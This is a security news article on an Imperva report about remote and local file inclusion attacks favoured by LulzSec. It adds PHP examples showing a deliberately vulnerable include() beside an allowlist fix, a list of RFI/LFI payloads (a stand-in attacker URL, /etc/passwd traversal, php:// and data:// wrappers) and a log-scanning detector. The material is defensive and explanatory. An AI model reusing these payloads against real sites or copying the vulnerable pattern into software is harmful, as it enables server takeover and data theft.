Imperva analyzes LulzSec’s attack tool

02 April 2012

In its latest Hacker Intelligence Initiative report, Imperva analyzes remote and local file inclusion (RFI/LFI) attacks as favored by LulzSec.

“RFI/LFI attacks enable hackers to execute malicious code and steal data through the manipulation of a company’s web server. RFI was among the four most prevalent Web application attacks used by hackers in 2011,” notes the report. “In fact,” it adds, “RFI/LFI was used most prominently by hacktivists.”

The attack takes advantage of PHP capabilities – specifically the ability to ‘include’ a separate file at run time. “Web applications that are vulnerable to malicious file inclusion typically accept the include target as a user controlled parameter and fail to sufficiently validate it. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server.” A successfully exploited RFI vulnerability lets the attacker run PHP of their choosing on the web server, which in practice means complete control of it – and PHP is used by more than 75% of the internet’s web applications.
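To make the mechanism concrete, here is an added example (not code from the Imperva report or from this article) of the vulnerable pattern beside a hardened version. It assumes a hypothetical site that selects page templates from ./pages/ with a ?page= parameter; the attack strings at the bottom are constructed for illustration.

```php
<?php
// Added example, not from the Imperva report or the article.
// Assumed layout: templates live in ./pages/<name>.php and are selected
// with ?page=<name>, e.g. /index.php?page=about

// --- Vulnerable pattern: the request parameter goes straight into include().
// With allow_url_include=On, ?page=http://attacker.example/shell.txt executes
// attacker-hosted PHP (RFI). Even with it off, ?page=../../etc/passwd or a
// php://filter wrapper discloses local files and source code (LFI).
function render_page_vulnerable(string $page): void
{
    include $page . '.php';   // DO NOT USE: user input used as a path
}

// --- Hardened pattern: the parameter is a key into a fixed allowlist.
// URLs, traversal sequences, stream wrappers, null bytes and case variants
// simply have no entry in the map, so they are rejected without any
// pattern matching or "sanitising" of the path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the template filename for an allowed page key, or null.
function page_file(string $page): ?string
{
    return PAGES[$page] ?? null;
}

function render_page(string $page): void
{
    $file = page_file($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // The included path is built from constants only; $page never touches it.
    include __DIR__ . '/pages/' . $file;
}

// Constructed attack payloads, to show what the allowlist turns away.
$payloads = [
    'about',                                               // legitimate
    'http://attacker.example/shell.txt',                   // RFI
    '../../../../etc/passwd',                              // LFI via traversal
    "../../../../etc/passwd\0",                            // null-byte truncation (PHP < 5.3.4)
    'php://filter/convert.base64-encode/resource=index',   // source disclosure via wrapper
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==',   // data wrapper carrying <?php phpinfo();
];
foreach ($payloads as $p) {
    $verdict = page_file($p) === null ? 'REJECTED' : 'ALLOWED';
    printf("%-60s %s\n", addcslashes($p, "\0..\37"), $verdict);
}
```

The point of the hardened version is that the user-supplied value is never used as a path at all, so there is no filter to bypass; only the first payload is allowed. Disabling allow_url_include (off by default since PHP 5.2) closes the remote case outright, but does nothing for the local file disclosure, which is why the allowlist is still needed.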

Recent incidents include the TimThumb vulnerability, a file inclusion flaw in a widely used WordPress image-resizing script that led to the compromise of 1.2 million WordPress websites, and the military dating website that was breached by the hacktivist group LulzSec.

Imperva suggests a number of ways to mitigate RFI/LFI attacks. These include finding your own vulnerabilities using the same methods as the hackers: dorking (otherwise known as ‘Google hacking’, which uses search engines to find hints of possible vulnerabilities, for example URLs with include-style parameters) and the use of both commercial and free vulnerability scanners. Also useful would be a web application firewall (WAF) and blacklisting known attack IPs, although attackers move between hosts quickly enough that an IP blacklist is only ever a stop-gap. The report also notes that the application code can be written to exclude RFI attacks, so detailed code review is advisable; the reliable code-level fix is to treat any include parameter as a key into a fixed allowlist of files rather than as a path, and to leave allow_url_include disabled so that remote URLs cannot be included at all.
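The WAF and scanner advice above comes down to recognising RFI/LFI payloads in request parameters. The following added example (not Imperva's detection logic or any product's rule set) checks web-server access log lines for the usual indicators: a remote URL in a parameter value, directory traversal (including double URL encoding), PHP stream wrappers, null bytes and well-known sensitive paths. The log entries and the indicator patterns are constructed for illustration.

```php
<?php
// Added example: a minimal RFI/LFI indicator check over access-log lines.
// Not Imperva's or any WAF's rule set; patterns and log lines are constructed.

const INDICATORS = [
    'remote URL in parameter' => '~=(?:https?|ftps?)://~i',
    'directory traversal'     => '~(?:\.\./|\.\.\\\\)~',
    'PHP stream wrapper'      => '~\b(?:php|data|expect|phar|zip|glob)://~i',
    'null byte'               => '~\x00~',
    'sensitive local file'    => '~/(?:etc/passwd|proc/self/environ|var/log/apache2?)~i',
];

// Decode repeatedly (bounded) so %252e%252e%252f is seen as ../
function normalise(string $query): string
{
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($query);
        if ($decoded === $query) {
            break;
        }
        $query = $decoded;
    }
    return $query;
}

// Pull the client IP and request URI out of a combined-format log entry.
function parse_request(string $line): ?array
{
    if (!preg_match('~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})~', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'uri' => $m[4], 'status' => (int) $m[5]];
}

// Returns the matched indicator names for a line, or null when nothing matched.
function check_line(string $line): ?array
{
    $req = parse_request($line);
    if ($req === null) {
        return null;
    }
    $pos = strpos($req['uri'], '?');
    if ($pos === false) {
        return null;            // no query string, nothing to inspect here
    }
    $decoded = normalise(substr($req['uri'], $pos + 1));
    $hits = [];
    foreach (INDICATORS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits ? ['ip' => $req['ip'], 'uri' => $req['uri'], 'hits' => $hits] : null;
}

// Constructed sample entries (not real traffic).
$log = <<<'LOG'
203.0.113.7 - - [02/Apr/2012:10:01:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.8 - - [02/Apr/2012:10:01:13 +0000] "GET /index.php?page=http://198.51.100.5/c99.txt HTTP/1.1" 200 3120
203.0.113.9 - - [02/Apr/2012:10:01:14 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1809
203.0.113.9 - - [02/Apr/2012:10:01:15 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1" 404 231
203.0.113.10 - - [02/Apr/2012:10:01:16 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 4096
LOG;

foreach (explode("\n", $log) as $line) {
    if ($hit = check_line($line)) {
        printf("%-13s %s\n    -> %s\n", $hit['ip'], $hit['uri'], implode(', ', $hit['hits']));
    }
}
```

Only the first entry passes clean; the other four each trip at least one indicator. Treat this as a triage aid rather than a WAF: a 200 response to a traversal or wrapper request is the line worth investigating, and the same patterns applied to your own scanner output are the cheap version of the "find your own vulnerabilities" advice.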

“However, ensuring that each and every piece of database access code is immune to RFI attack in normal-size applications that also include third party components is difficult. One must therefore assume that deployed web applications probably do include RFI vulnerabilities upon deployment and complement code review with a WAF,” it concluded.
